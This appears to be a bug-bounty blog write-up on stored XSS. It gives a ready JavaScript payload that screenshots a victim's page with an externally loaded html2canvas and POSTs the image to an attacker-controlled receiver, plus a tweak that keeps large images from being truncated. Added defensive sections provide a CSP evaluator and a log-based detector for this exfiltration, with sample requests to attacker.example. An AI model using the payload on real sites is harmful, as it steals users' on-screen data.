

layout: post
title: 12. xss bypass
category: SRC
tags: SRC
keywords: SRC,XSS

Preface

This is the 12th short write-up in my record of real SRC (security response center) submissions; this one covers an XSS filter bypass on a website.

Blind stored XSS

Stored XSS generally falls into two situations, with the severity rated as follows:

  1. The affected page is reachable from the public internet: the severity is rated by how sensitive the backend is, and this usually qualifies as high risk.
  2. The affected page is not reachable from the public internet: if you catch a cookie but cannot demonstrate further harm, it is generally rated as low risk.
  3. Wormable XSS that hits other users: high risk.
  4. Ordinary user-level stored XSS that is not wormable: medium risk.

Raising the severity

For the second case, the obvious way to demonstrate more impact is to take a screenshot of the victim's page through the XSS.

document.write("<script src=\"https:\/\/xxxxx\/html2canvas.js\"><\/script>");

window.onload = function () {
    html2canvas(document.body, {
        onrendered: function (canvas) {
            // Send the captured screenshot to the receiver; the image data is very long, so it can only go via POST
            var xhr = function () {
                var request = false;
                if (window.XMLHttpRequest) {
                    request = new XMLHttpRequest();
                } else if (window.ActiveXObject) {
                    try {
                        request = new window.ActiveXObject('Microsoft.XMLHTTP');
                    } catch (e) {
                    }
                }
                return request;
            }();

            var request = function (method, src, argv, content_type) {
                xhr.open(method, src, false);
                if (method == 'POST') xhr.setRequestHeader('Content-type', content_type);
                xhr.send(argv); // send the POST data
                return xhr.responseText;
            };

            var attack_a = function () {
                var src = "https://xxxx/xss.php?do=api&id={projectId}"; // POST receiving address
                var argv_0 = "'&screenshot=" + canvas.toDataURL(); // the POST field name is screenshot
                request("POST", src, argv_0, "application/x-www-form-urlencoded");
            };

            attack_a();
        }
    });
}
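From the defending side, the payload above depends on two network actions that a Content-Security-Policy on the internal backend can deny: loading html2canvas from an external host (governed by `script-src`) and POSTing the canvas data URL to a collector (governed by `connect-src`). The following is an added example, not code from the original post: a minimal CSP evaluator that checks a policy against exactly those two requests. The hostnames `attacker.example` and `admin.internal.example` are constructed stand-ins for the `xxxx` placeholders in the payload, and the evaluator covers only host-, scheme- and `'self'` sources (no nonces or hashes).

```javascript
// Added example (not from the original post): a minimal Content-Security-Policy
// evaluator. It checks whether a page's CSP would permit the two requests the
// html2canvas screenshot payload depends on: loading the library from an
// external host (script-src) and POSTing the data URL to a collector
// (connect-src). Hostnames are constructed placeholders.

// Parse a CSP header into a Map of directive name -> list of source expressions.
// As in real CSP, the first occurrence of a directive wins.
function parseCsp(header) {
  const directives = new Map();
  for (const part of header.split(';')) {
    const tokens = part.trim().split(/\s+/).filter(Boolean);
    if (tokens.length === 0) continue;
    const [name, ...sources] = tokens;
    if (!directives.has(name.toLowerCase())) directives.set(name.toLowerCase(), sources);
  }
  return directives;
}

// Does one source expression permit `url` for a page served from `pageOrigin`?
function sourceMatches(source, url, pageOrigin) {
  const src = source.toLowerCase();
  if (src === "'self'") return url.origin === pageOrigin.origin;
  if (src.startsWith("'")) return false; // 'none', 'unsafe-inline', nonces, hashes: never a host match
  if (src === '*') return ['http:', 'https:', 'ws:', 'wss:'].includes(url.protocol);
  if (/^[a-z][a-z0-9+.-]*:$/.test(src)) return url.protocol === src; // scheme-source, e.g. https:
  // host-source: [scheme://][*.]host[:port]
  const m = /^(?:([a-z][a-z0-9+.-]*):\/\/)?(\*\.)?([^:/*]+)(?::(\d+|\*))?$/.exec(src);
  if (!m) return false;
  const [, scheme, wildcard, host, port] = m;
  if (scheme && url.protocol !== scheme + ':') return false;
  const hostname = url.hostname.toLowerCase();
  if (wildcard ? !hostname.endsWith('.' + host) : hostname !== host) return false;
  if (port && port !== '*') {
    const urlPort = url.port || (url.protocol === 'https:' ? '443' : '80');
    if (urlPort !== port) return false;
  }
  return true;
}

// Would the policy allow fetching `urlString` under `directive`? Falls back to
// default-src when the directive is absent; with neither present, CSP allows it.
function cspAllows(header, directive, urlString, pageOriginString) {
  const directives = parseCsp(header);
  const sources = directives.get(directive) ?? directives.get('default-src');
  if (sources === undefined) return true;
  const url = new URL(urlString);
  const pageOrigin = new URL(pageOriginString);
  return sources.some((s) => sourceMatches(s, url, pageOrigin));
}

// The two requests the screenshot payload makes, checked against one policy.
function screenshotExfilBlocked(header, pageOrigin) {
  const scriptLoad = cspAllows(header, 'script-src', 'https://attacker.example/html2canvas.js', pageOrigin);
  const post = cspAllows(header, 'connect-src', 'https://attacker.example/xss.php?do=api', pageOrigin);
  return { scriptLoad, post, blocked: !scriptLoad && !post };
}

// A policy that looks restrictive but leaves script-src wide open ...
const WEAK_CSP = "default-src 'self'; script-src * 'unsafe-inline'";
// ... and one that confines both scripts and XHR/fetch to the page's own origin.
const HARDENED_CSP = "default-src 'none'; script-src 'self'; connect-src 'self'; img-src 'self' data:";

console.log(screenshotExfilBlocked(WEAK_CSP, 'https://admin.internal.example'));
console.log(screenshotExfilBlocked(HARDENED_CSP, 'https://admin.internal.example'));
```

With `WEAK_CSP` the external library load is permitted (so the screenshot is taken even though the POST is refused by the `default-src 'self'` fallback), while `HARDENED_CSP` denies both requests. Note also that the hardened policy drops `'unsafe-inline'`, which is what lets the injected stored-XSS script run in the first place; the evaluator only models the two follow-on requests.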

The problem on this platform was that the image data was sometimes too large, and the base64 string arrived truncated.
In that case the complete picture can still be transmitted by reducing the amount of pixel data that is sent.

Solution

var fullQuality = canvas.toDataURL("image/jpeg", 1.0);
// data:image/jpeg;base64,/9j/4AAQSkZJRgABAQ...9oADAMBAAIRAxEAPwD/AD/6AP/Z"
var mediumQuality = canvas.toDataURL("image/jpeg", 0.5);
var lowQuality = canvas.toDataURL("image/jpeg", 0.1);

Even at reduced quality, the user's data in the resulting screenshot is still clearly legible.
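Whatever quality setting is used, the exfiltration has a recognisable shape on the wire: a form-encoded POST to an external host whose field value is a `data:image/...;base64,` URL with a large decoded size. The following is an added example, not code from the original post: detection logic that scans egress-proxy style request logs for that pattern, computes the decoded image size from the base64 length, and reports fields above a threshold. The log format, client addresses, bodies and the `attacker.example` host are all constructed for the example, and the approach assumes a proxy or DLP gateway that records request bodies.

```javascript
// Added example (not from the original post): server-side detection of the
// exfiltration pattern above, i.e. a form-encoded POST whose field carries a
// canvas data URL. Log format, addresses and bodies are constructed.

const DATA_URI_RE = /^data:(image\/[a-z0-9.+-]+);base64,([A-Za-z0-9+/]+={0,2})$/i;

// Decoded byte length of a base64 string, computed without decoding it.
function base64DecodedLength(b64) {
  const padding = b64.endsWith('==') ? 2 : b64.endsWith('=') ? 1 : 0;
  return Math.floor((b64.length * 3) / 4) - padding;
}

// Scan proxy-log lines of the constructed form
//   <client> "<method> <url>" <status> body=<JSON-encoded request body>
// and report POST fields carrying an image data URL of at least minBytes decoded.
function findImageExfil(logLines, { minBytes = 1024 } = {}) {
  const findings = [];
  for (const line of logLines) {
    const m = /^(\S+) "(\w+) (\S+)" (\d{3}) body=(.*)$/.exec(line);
    if (!m || m[2] !== 'POST') continue;
    let body;
    try {
      body = JSON.parse(m[5]);
    } catch {
      continue; // malformed log line: skip rather than abort the scan
    }
    for (const [field, value] of new URLSearchParams(body)) {
      // A raw '+' inside unencoded base64 is decoded as a space by form parsing; restore it.
      const d = DATA_URI_RE.exec(value.replace(/ /g, '+'));
      if (!d) continue;
      const bytes = base64DecodedLength(d[2]);
      if (bytes >= minBytes) {
        findings.push({ client: m[1], url: m[3], field, mime: d[1], bytes });
      }
    }
  }
  return findings;
}

// Constructed sample: one screenshot POST shaped like the payload above (the
// base64 is 512 repetitions of a JPEG-header-looking chunk, not a real image),
// plus benign traffic including a tiny legitimate avatar upload.
const screenshotBody = "'&screenshot=data:image/jpeg;base64," + '/9j/4AAQ'.repeat(512);
const SAMPLE_LOG = [
  `10.0.0.5 "POST https://attacker.example/xss.php?do=api&id=42" 200 body=${JSON.stringify(screenshotBody)}`,
  `10.0.0.7 "POST https://admin.internal.example/login" 302 body=${JSON.stringify('user=alice&password=REDACTED')}`,
  `10.0.0.9 "GET https://admin.internal.example/index.html" 200 body=""`,
  `10.0.0.11 "POST https://admin.internal.example/avatar" 200 body=${JSON.stringify('icon=data:image/png;base64,iVBORw0KGgo=')}`,
];

console.log(findImageExfil(SAMPLE_LOG));
```

The size threshold is what separates a screenshot from a small legitimate inline image: the constructed 4096-character base64 string decodes to 3072 bytes and is flagged, while the 8-byte avatar is not. In a real deployment the destination host (not on an allow-list) would be a second, independent signal.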

Afterword

xxxxx

Origin blog.csdn.net/xiru9972/article/details/113114923